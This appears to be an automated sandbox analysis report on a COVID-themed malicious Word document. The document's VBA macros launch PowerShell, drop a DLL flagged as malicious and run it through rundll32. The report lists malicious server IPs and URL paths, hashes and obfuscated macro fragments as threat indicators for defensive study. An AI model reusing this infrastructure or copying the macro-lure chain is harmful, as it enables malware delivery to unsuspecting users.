                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                      Number of analysed new started processes analysed:17
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • GSI enabled (VBA)
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.troj.evad.winDOC@26/7@2/4
                      EGA Information:Failed
                      HDC Information:
                      • Successful, ratio: 33.2% (good quality ratio 31.6%)
                      • Quality average: 71.6%
                      • Quality standard deviation: 24.9%
                      HCA Information:
                      • Successful, ratio: 72%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Found application associated with file extension: .doc
                      • Found Word or Excel or PowerPoint or XPS Viewer
                      • Found warning dialog
                      • Click Ok
                      • Attach to Office via COM
                      • Scroll down
                      • Close Viewer
                      Warnings:
                      Show All
                      • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                      • TCP Packets have been reduced to 100
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      20:30:36API Interceptor1x Sleep call for process: msg.exe modified
                      20:30:37API Interceptor32x Sleep call for process: powershell.exe modified
                      20:30:41API Interceptor867x Sleep call for process: rundll32.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      69.49.88.46AG60273928I_COVID-19_SARS-CoV-2.docGet hashmaliciousBrowse
                      • 69.49.88.46/kdd8h70lwp/lfu3p05/u2kanr3/
                      FQ5754217297FF.docGet hashmaliciousBrowse
                      • 69.49.88.46/2hsmx8qypf/8iv55uq7hpxe/hf9tz7/
                      71.72.196.159FILE-092020.docGet hashmaliciousBrowse
                      • 71.72.196.159/Asgu9G/UPAJk1H/k1wB2h2IhMQGy9M4O/CwukNROTLhDmT5iz7yr/QNOGQRhP/
                      X5w6zls.exeGet hashmaliciousBrowse
                      • 71.72.196.159/YmBvqXK/A1bXsLoMSYg/i0gaWBtL9c/yD6C9feh/
                      #U5909#U531620.09.docGet hashmaliciousBrowse
                      • 71.72.196.159/HisuDo3My4/
                      #U5909#U531620-09.docGet hashmaliciousBrowse
                      • 71.72.196.159/IEHZ5/HVlPRDwFoj/OuQtgxrIROu80/9t0syM1s3J/
                      BCRYO2020.09.19.docGet hashmaliciousBrowse
                      • 71.72.196.159/UdroxO4ouHCZo3/SPUpyAXBlZAJ/kR4LZr6qJHOM3/9tr1e4XNde6jxg22B/j2TVTGpcHCpnic1/
                      drdgPfOU36.exeGet hashmaliciousBrowse
                      • 71.72.196.159/6YX6sQtKK6MLta/TbNsyU7EbVPMjL/0MoOi2xkKCNW7y67b/USvDoTSxSZ/BulSaK/
                      cC.exeGet hashmaliciousBrowse
                      • 71.72.196.159/LLRDDCScx1Byk2D/krMwjOaF56Uc9Il6eMD/WuP6hJZcQa4/5p5T7L/
                      #U304b#U3089#U306e#U5909#U66f419.docGet hashmaliciousBrowse
                      • 71.72.196.159/3oAMQ7MNt66lIE8EI/DizHtXLtgQHqx/U2NH3hw0GWPotmCV/dMZCjcyGRF/qUw6hgI/FwMSWVK67N4mSEoC/
                      LTB.docGet hashmaliciousBrowse
                      • 71.72.196.159/QxJ68bj/OcYZ8J9RWfz7qwepeY/7Zys/K1Bpu/5CRfSZCJqSBtKcz/dhIXBeS6vLJR/
                      #U6700#U65b0#U306e#U69cb#U9020#U56f3.docGet hashmaliciousBrowse
                      • 71.72.196.159/JMk30NNrO1ReTb/6XR5dMIuJFNZfcR/yg0fR2fj6mXvduKb/
                      HROF2020.docGet hashmaliciousBrowse
                      • 71.72.196.159/EMc53XBYQbN5Jl/
                      #U304b#U3089#U306e#U5909#U66f49#U6708.docGet hashmaliciousBrowse
                      • 71.72.196.159/1ieklOTBS/ak8HNcj/
                      DAT_2020_09_7444352632.docGet hashmaliciousBrowse
                      • 71.72.196.159/cv2mWGF5/67dqj/ZkWPeQbBjvdWajsuvx/lYL2/TljK64Me1bfzHxBI/
                      Dokumentation_FC_41232269.docGet hashmaliciousBrowse
                      • 71.72.196.159/ejSg6gT/pSnsS3gAqTGFHUm9V/Jg8Kv3cnCG2Miq94/Sf9xZ/
                      BIZ_18_09_2020_4070550449.docGet hashmaliciousBrowse
                      • 71.72.196.159/tiVhuDLoHxS/G2H7AH/
                      Betrag_2020_09_4036385628.docGet hashmaliciousBrowse
                      • 71.72.196.159/RQWehX/fgtv5/htJbK7vQCVUSRwZJeE/
                      SCNVS2020.09.docGet hashmaliciousBrowse
                      • 71.72.196.159/b9v6oT61Mzfa1oQAP/IIlXlIMvsnl/
                      ZZLEJDXT8LH-20200918.docGet hashmaliciousBrowse
                      • 71.72.196.159/v4zRqawC6/myK9u1BaFBM0ak/
                      #U5909#U531609_18.docGet hashmaliciousBrowse
                      • 71.72.196.159/w5aqN3cMRoz5Eq/
                      INF_18_09_2020.docGet hashmaliciousBrowse
                      • 71.72.196.159/5U1wQcRoWdLiEGx/gIcTfWkFIkHPs5yEqC/

                      Domains

                      No context

                      ASN

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      AEROTEK-ASTRRe.invoice.exeGet hashmaliciousBrowse
                      • 37.230.107.14
                      36bjGck9ps.exeGet hashmaliciousBrowse
                      • 37.230.107.15
                      n1hou07jRi.exeGet hashmaliciousBrowse
                      • 37.230.107.14
                      SZOSVrCvEl.exeGet hashmaliciousBrowse
                      • 37.230.107.17
                      2LR7qIZpc9.exeGet hashmaliciousBrowse
                      • 37.230.107.14
                      QXfxLv6GGp.exeGet hashmaliciousBrowse
                      • 37.230.107.17
                      0908000090000.exeGet hashmaliciousBrowse
                      • 37.230.106.17
                      Tax Invoices IN102738 IN102739 IN102740 (2).exeGet hashmaliciousBrowse
                      • 37.230.107.13
                      Quotation 7339.exeGet hashmaliciousBrowse
                      • 37.230.107.16
                      kart bilgisizzz.exeGet hashmaliciousBrowse
                      • 37.230.106.16
                      CardFinans09000.exeGet hashmaliciousBrowse
                      • 37.230.106.17
                      0lQnavQlRv.exeGet hashmaliciousBrowse
                      • 37.230.107.13
                      payment invoice090909000.exeGet hashmaliciousBrowse
                      • 37.230.106.16
                      POUIYYY.exeGet hashmaliciousBrowse
                      • 37.230.106.16
                      invoice 2.exeGet hashmaliciousBrowse
                      • 37.230.107.15
                      invoice 2.exeGet hashmaliciousBrowse
                      • 37.230.107.15
                      TFTU6843783 - 32.exeGet hashmaliciousBrowse
                      • 94.199.200.89
                      BL NO - 010446090.exeGet hashmaliciousBrowse
                      • 94.199.200.89
                      09000000MMM090.exeGet hashmaliciousBrowse
                      • 37.230.106.17
                      sUHUL8pabJ.exeGet hashmaliciousBrowse
                      • 37.230.107.14
                      TWC-10796-MIDWESTUSAG60273928I_COVID-19_SARS-CoV-2.docGet hashmaliciousBrowse
                      • 71.72.196.159
                      FQ5754217297FF.docGet hashmaliciousBrowse
                      • 71.72.196.159
                      invoice.docGet hashmaliciousBrowse
                      • 75.188.107.174
                      N3TmJXOg4P.dllGet hashmaliciousBrowse
                      • 75.188.107.174
                      59973067.docGet hashmaliciousBrowse
                      • 75.188.107.174
                      Electronic form.docGet hashmaliciousBrowse
                      • 75.188.107.174
                      2020_12- Statement.docGet hashmaliciousBrowse
                      • 75.188.107.174
                      http://foodlike.kz/templates/QUJOpdohWbgqcRtXl3uAR0twmMS59eLk1cnA6P2oA15NZcjPZPj0GO2DF/Get hashmaliciousBrowse
                      • 24.164.79.147
                      utox.exeGet hashmaliciousBrowse
                      • 174.99.153.50
                      New Doc 2020-12-21 09.53.07_8.docGet hashmaliciousBrowse
                      • 70.92.118.112
                      fdwv4hWF1M.exeGet hashmaliciousBrowse
                      • 72.133.174.230
                      Check.vbsGet hashmaliciousBrowse
                      • 69.76.61.62
                      RB1NsQ9LQf.exeGet hashmaliciousBrowse
                      • 71.79.68.222
                      42H3JnmK5y.exeGet hashmaliciousBrowse
                      • 98.103.204.12
                      7M5xbLL8eO.exeGet hashmaliciousBrowse
                      • 98.103.204.12
                      gQszb56YfO.exeGet hashmaliciousBrowse
                      • 71.72.196.159
                      d21iCa31cs.exeGet hashmaliciousBrowse
                      • 98.103.204.12
                      dXp0Z8K4ya.exeGet hashmaliciousBrowse
                      • 98.103.204.12
                      NL5ykZj9sR.exeGet hashmaliciousBrowse
                      • 98.103.204.12
                      vr2UB6w0Lu.exeGet hashmaliciousBrowse
                      • 98.103.204.12
                      ALASTYRTRWeBU3HLcSGLmmDb.exeGet hashmaliciousBrowse
                      • 5.2.81.142
                      arrival notice-ETA 10th-11,2020.exeGet hashmaliciousBrowse
                      • 185.8.128.151
                      P.O_0006983487302.pdf.exeGet hashmaliciousBrowse
                      • 5.2.84.232
                      P.O-00490585693.pdf.exeGet hashmaliciousBrowse
                      • 5.2.84.232
                      SHIPPING DOCS.exeGet hashmaliciousBrowse
                      • 5.2.84.160
                      Request Quotation.exeGet hashmaliciousBrowse
                      • 5.2.84.160
                      SOA.exeGet hashmaliciousBrowse
                      • 5.2.84.160
                      payment details.exeGet hashmaliciousBrowse
                      • 5.2.84.160
                      Request Quotation.exeGet hashmaliciousBrowse
                      • 5.2.84.160
                      Request Quotation.exeGet hashmaliciousBrowse
                      • 5.2.84.160
                      docss.exeGet hashmaliciousBrowse
                      • 5.2.84.160
                      SOA JUL..exeGet hashmaliciousBrowse
                      • 5.2.84.160
                      DOCUMENTS.exeGet hashmaliciousBrowse
                      • 5.2.84.160
                      MT1O3 copy.exeGet hashmaliciousBrowse
                      • 5.2.84.160
                      PURCHASE ORDER.bin.exeGet hashmaliciousBrowse
                      • 5.2.84.160
                      Electronic form.docGet hashmaliciousBrowse
                      • 185.8.33.27
                      REMITTANCE COPY.exeGet hashmaliciousBrowse
                      • 5.2.84.160
                      SOA.exeGet hashmaliciousBrowse
                      • 5.2.84.160
                      PURCHASE ORDER.exeGet hashmaliciousBrowse
                      • 5.2.84.160
                      ionua.exeGet hashmaliciousBrowse
                      • 5.2.81.142
                      MPW-MACHLINK-NETUSAG60273928I_COVID-19_SARS-CoV-2.docGet hashmaliciousBrowse
                      • 69.49.88.46
                      FQ5754217297FF.docGet hashmaliciousBrowse
                      • 69.49.88.46

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4AB68257-B28F-4AE5-86AD-026C320EA73C}.tmp
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):1024
                      Entropy (8bit):0.05390218305374581
                      Encrypted:false
                      SSDEEP:3:ol3lYdn:4Wn
                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\XP-9743 Medical report COVID-19.LNK
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Wed Aug 26 14:08:12 2020, atime=Wed Jan 13 03:30:33 2021, length=161792, window=hide
                      Category:dropped
                      Size (bytes):2238
                      Entropy (8bit):4.553735922091283
                      Encrypted:false
                      SSDEEP:48:8T/XT3In3e/7J0e/kfQh2T/XT3In3e/7J0e/kfQ/:8T/XLIn3eOe8fQh2T/XLIn3eOe8fQ/
                      MD5:A1640691CEEC8E432223B5D9BF210FA0
                      SHA1:9774A9DCEEEDA35DEE3885096DEB30165BFAE407
                      SHA-256:A7025C15BBD7A8393D83B6C7AADDC266A589383C76A6C9A3F4095F28FF89213E
                      SHA-512:24EAB918AA1E67DD52173FE047EDCC327C138B8C9A07352C28691C20470E743B6EDA22EFE48AEAA7A50001355E99407C2E6BB7AFACE29C8B7EC1644EB5E5E5DB
                      Malicious:false
                      Preview: L..................F.... ....S...{...S...{...|..d....x...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..x..-R.# .XP-974~1.DOC..t.......Q.y.Q.y*...8.....................X.P.-.9.7.4.3. .M.e.d.i.c.a.l. .r.e.p.o.r.t. .C.O.V.I.D.-.1.9...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\305090\Users.user\Desktop\XP-9743 Medical report COVID-19.doc.:.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.X.P.-.9.7.4.3. .M.e.d.i.c.a.l. .r.e.p.o.r.t. .C.O.V.I.D.-.1.9...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1
                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):131
                      Entropy (8bit):5.033583001902089
                      Encrypted:false
                      SSDEEP:3:M1X4WztELQSjmIfFu4olfiWztELQSjmIfFu4omX1X4WztELQSjmIfFu4ov:MDELyIfjufrELyIfjNELyIfjy
                      MD5:704CBC7C6FF8908BC5C52CE42F4761B5
                      SHA1:5D1240BCC4954C9A5BBE7F8E5DFF3395536CE3BB
                      SHA-256:53B0E81D3E027793CE23B9E4393A9FDDBCC24D1FFEE1ECC4661FD6C0079EAA25
                      SHA-512:1720DCF3868389BC3C9280DFA018385A4AE383B1A84680BBA3B4BFC70AEFBDA6EA3C8A5F04DA75144B47EDFFA0913180C032488018F9A4915B04D159528D1974
                      Malicious:false
                      Preview: [doc]..XP-9743 Medical report COVID-19.LNK=0..XP-9743 Medical report COVID-19.LNK=0..[doc]..XP-9743 Medical report COVID-19.LNK=0..
                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):162
                      Entropy (8bit):2.431160061181642
                      Encrypted:false
                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                      Malicious:false
                      Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JFVIB84821J1PYPBOEY5.temp
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):8016
                      Entropy (8bit):3.586617243298514
                      Encrypted:false
                      SSDEEP:96:chQCsMqftMqvsqvJCwolz8hQCsMqftMqvsEHyqvJCwor/z1PYftJHyf8Iht+lUVJ:cy3olz8y7Hnor/z1bf8IBIu
                      MD5:5CC20A1959F6110E368E14FCE4C71E93
                      SHA1:17DCB465855248585EDE81A4B56D045B043B1BE7
                      SHA-256:8E444E6BEFE6AFC6A1041D54AC7D9290E2595EF93BAD5E4D820949E1841117E1
                      SHA-512:A415E620A9357D9F6D239887EACB0CAD8E5907F8CE29247D098526362650E80D7F18B0D5FE6D13351E563CD2F5EAEFC8F70CD26AE915EC7C8CDABCCBE2409BC5
                      Malicious:false
                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                      C:\Users\user\Desktop\~$-9743 Medical report COVID-19.doc
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):162
                      Entropy (8bit):2.431160061181642
                      Encrypted:false
                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                      Malicious:false
                      Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                      C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):340824
                      Entropy (8bit):4.347471014428068
                      Encrypted:false
                      SSDEEP:3072:aG9ctfNneahaNfjraHoEkApi23X5TKavlyw8W8:aG+Fe17mHoU/3NywH8
                      MD5:A675444E1D39C57D28ACE66CCDF56209
                      SHA1:B40E2B76AFE537083B4F024594A262238B7733CC
                      SHA-256:EC2A858FF4D3505EADEEB514A91ED38D34D80A81723DD48F8049A1E963C3587C
                      SHA-512:8CC242A9310AB3F25EB46453FAD48475ED2AA0E7EC0AD141C01339335B8905DF1578F14EBEB318EDF90014ECA794438C8CF1F2704549943056C00E6D587BD502
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z.._...........!...2.F...........!.......`...............................`...............................................p..d.......................X....P......................................................xr...............................text....C.......D.................. ..`.rdata.......`.......H..............@..@.data........p.......J..............@....text4...............T..............@....text5..d....@...................... ..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                      Static File Info

                      General

                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Licensed Soft Chips TCP capacity Future Savings Account redundant open-source Consultant Cambridgeshire digital Synergistic, Author: Ambre Vidal, Template: Normal.dotm, Last Saved By: Ethan Vasseur, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 12 17:56:00 2021, Last Saved Time/Date: Tue Jan 12 17:57:00 2021, Number of Pages: 1, Number of Words: 2466, Number of Characters: 14061, Security: 8
                      Entropy (8bit):6.693119364534795
                      TrID:
                      • Microsoft Word document (32009/1) 79.99%
                      • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                      File name:XP-9743 Medical report COVID-19.doc
                      File size:160861
                      MD5:da92c55d4b08367fb79a6bc6ae4da985
                      SHA1:8ee3239cfb5dd7d9ddd8e503c8fec19e21ca3c3d
                      SHA256:137602cebf7c61fe1bb6647160167813271afbd74a52fcccf03a0ad590a9ef61
                      SHA512:9ef0222dd48f94d149e090f17ab465389d489eefd5b4cad14867aa1bb5bbd4ca4af1a0d88ab62d74a90c3dbdb906cabdd823cd8105516a9b19fe642005f17e92
                      SSDEEP:3072:EX9ufstRUUKSns8T00JSHUgteMJ8qMD7g8NtP:69ufsfgIf0pL8PP
                      File Content Preview:........................>......................................................................................................................................................................................................................................

                      File Icon

                      Icon Hash:e4eea2aaa4b4b4a4

                      Static OLE Info

                      General

                      Document Type:OLE
                      Number of OLE Files:1

                      OLE File "XP-9743 Medical report COVID-19.doc"

                      Indicators

                      Has Summary Info:True
                      Application Name:Microsoft Office Word
                      Encrypted Document:False
                      Contains Word Document Stream:True
                      Contains Workbook/Book Stream:False
                      Contains PowerPoint Document Stream:False
                      Contains Visio Document Stream:False
                      Contains ObjectPool Stream:
                      Flash Objects Count:
                      Contains VBA Macros:True

                      Summary

                      Code Page:1252
                      Title:
                      Subject:Licensed Soft Chips TCP capacity Future Savings Account redundant open-source Consultant Cambridgeshire digital Synergistic
                      Author:Ambre Vidal
                      Keywords:
                      Comments:
                      Template:Normal.dotm
                      Last Saved By:Ethan Vasseur
                      Revion Number:1
                      Total Edit Time:0
                      Create Time:2021-01-12 17:56:00
                      Last Saved Time:2021-01-12 17:57:00
                      Number of Pages:1
                      Number of Words:2466
                      Number of Characters:14061
                      Creating Application:Microsoft Office Word
                      Security:8

                      Document Summary

                      Document Code Page:-535
                      Number of Lines:117
                      Number of Paragraphs:32
                      Thumbnail Scaling Desired:False
                      Company:
                      Contains Dirty Links:False
                      Shared Document:False
                      Changed Hyperlinks:False
                      Application Version:917504

                      Streams with VBA

                      VBA File Name: Gx8fznt8p0b, Stream Size: 10973
                      General
                      Stream Path:Macros/VBA/Gx8fznt8p0b
                      VBA File Name:Gx8fznt8p0b
                      Stream Size:10973
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . { . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:01 16 01 00 00 f0 00 00 00 14 06 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 1b 06 00 00 7b 1f 00 00 00 00 00 00 01 00 00 00 0c ff 3a 0a 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                      VBA Code Keywords

                      Keyword
                      XFTxEQJDN
                      "w]xm[vw]xm[v"
                      gIKrmCJj
                      xSGbCJ
                      dxRvhumeH
                      Fix(dTSeMQG)
                      Fix(zHdGqDLim)
                      (Fix(DqmzWgJHy)
                      RXvmIZQm
                      AiEWeBgBl
                      MSsFhG
                      CXFGDHlI
                      "w]xm[vrow]xm[vw]xm[vcew]xm[vsw]xm[vsw]xm[vw]xm[v"
                      shylMG
                      reejhCJo:
                      Fix(ZJLnFB)
                      Resume
                      XFTxEQJDN:
                      Fix(CcLHCeb)
                      TMBZGWW
                      (Fix(sJrfKHHt)
                      Fix(neULB)
                      xbIYArN
                      DheYzB
                      HRHrHJDlD
                      MwLbBJBFI
                      NhxAGvAH
                      YjbuICHY
                      Len(dsfe))),
                      ulfWCCiFF
                      WJzJI
                      kshfoytP:
                      Fix(RXvmIZQm)
                      cuCYC
                      Fix(ZYHZlIii)
                      JfXdCsEp
                      InptugrzA
                      Fix(gIKrmCJj)
                      Fix(kshfoytP)
                      JSrfhd:
                      Fix(JfXdCsEp)
                      MiKCE
                      Fix(PNjoAGP)
                      gpIBBDhi
                      JfXdCsEp:
                      Fix(nYjBpD)
                      Fix(sJrfKHHt)
                      UYbmGGDC
                      QKtUz
                      Fix(QKtUz)
                      SetWuCGdA
                      RXvmIZQm:
                      Fix(RXzua)
                      Fix(QWDldHHR)
                      Fix(BzbdEl)
                      TgbVU
                      tqIkDIrD
                      nYjBpD
                      Fix(shylMG)
                      dTSeMQG
                      DJlZDCM
                      "w]xm[v",
                      rvmetA
                      ykgfGkNf
                      Fix(XFTxEQJDN)
                      (Fix(cYdfo)
                      Fix(fRfgHB)
                      Fix(JSrfhd)
                      NfAUFNI
                      CcLHCeb
                      eEAOBGE
                      FBkjB
                      reejhCJo
                      mZXJjJAgq
                      aDUvJDOI:
                      cYdfo
                      zHdGqDLim
                      sJrfKHHt
                      iKSwBkUWG
                      PNjoAGP:
                      RXzua
                      aDUvJDOI
                      (Fix(dTSeMQG)
                      neULB:
                      lmdMEA
                      Fix(cYdfo)
                      vRYIMlBHH
                      UnYMEIiCD
                      Fix(DqmzWgJHy)
                      dNfeF
                      PNjoAGP
                      tYFukEBCC
                      xSGbCJ:
                      "ww]xm[vinw]xm[vmw]xm[vgmw]xm[vtw]xm[vw]xm[v"
                      ElseIf
                      (Fix(fRfgHB)
                      UDFpCBJJ
                      (Fix(zHdGqDLim)
                      Fix(reejhCJo)
                      SgwfJAm
                      JSrfhd
                      OkSpwDa
                      QWDldHHR
                      ZYHZlIii:
                      Fix(xSGbCJ)
                      SrmTEEB
                      QWDldHHR:
                      vEHmFIM
                      (Fix(tYFukEBCC)
                      bONvDCElF
                      jzjFFpDhA
                      ggGVJ
                      fRfgHB
                      (Fix(PgRakD)
                      xTZpYXiBF
                      iTfwbHGDH
                      (Fix(CcLHCeb)
                      dUNUgHJG
                      Error
                      THkIAUF
                      kshfoytP
                      MybcQH
                      zCXyyY
                      Fix(AiEWeBgBl)
                      Attribute
                      Fix(aDUvJDOI)
                      GlHkEN
                      gpBWaEPFj
                      Fix(PgRakD)
                      fZVmJ
                      oaACDga
                      szALCGBF
                      (Fix(QKtUz)
                      Fix(tYFukEBCC)
                      VB_Name
                      ICwOHad
                      llWECD
                      (Fix(bONvDCElF)
                      PgRakD
                      gIKrmCJj:
                      (Fix(RXzua)
                      Fix(zKEHRtJGG)
                      Fix(DJlZDCM)
                      Function
                      hzXmmAn
                      Fix(bONvDCElF)
                      BzbdEl:
                      PohBnF
                      GdxqnN
                      DJlZDCM:
                      sTlFD
                      rUIOAx
                      shylMG:
                      VDhTuRJ
                      Double
                      neULB
                      GDDUGJd
                      BzbdEl
                      zKEHRtJGG
                      GqPOTjZ
                      BhhWnCHb
                      CuCzGCw
                      (Fix(nYjBpD)
                      aEWwP
                      nDpnHa
                      ZJLnFB
                      "w]xm[vpw]xm[v"
                      ZYHZlIii
                      (Fix(AiEWeBgBl)
                      Mid(Application.Name,
                      DqmzWgJHy
                      (Fix(zKEHRtJGG)
                      cMaNE
                      (Fix(ZJLnFB)
                      VBA Code
                      VBA File Name: Kyl0l3rqw280c6ssa, Stream Size: 1118
                      General
                      Stream Path:Macros/VBA/Kyl0l3rqw280c6ssa
                      VBA File Name:Kyl0l3rqw280c6ssa
                      Stream Size:1118
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . . 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 0c ff 33 b6 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

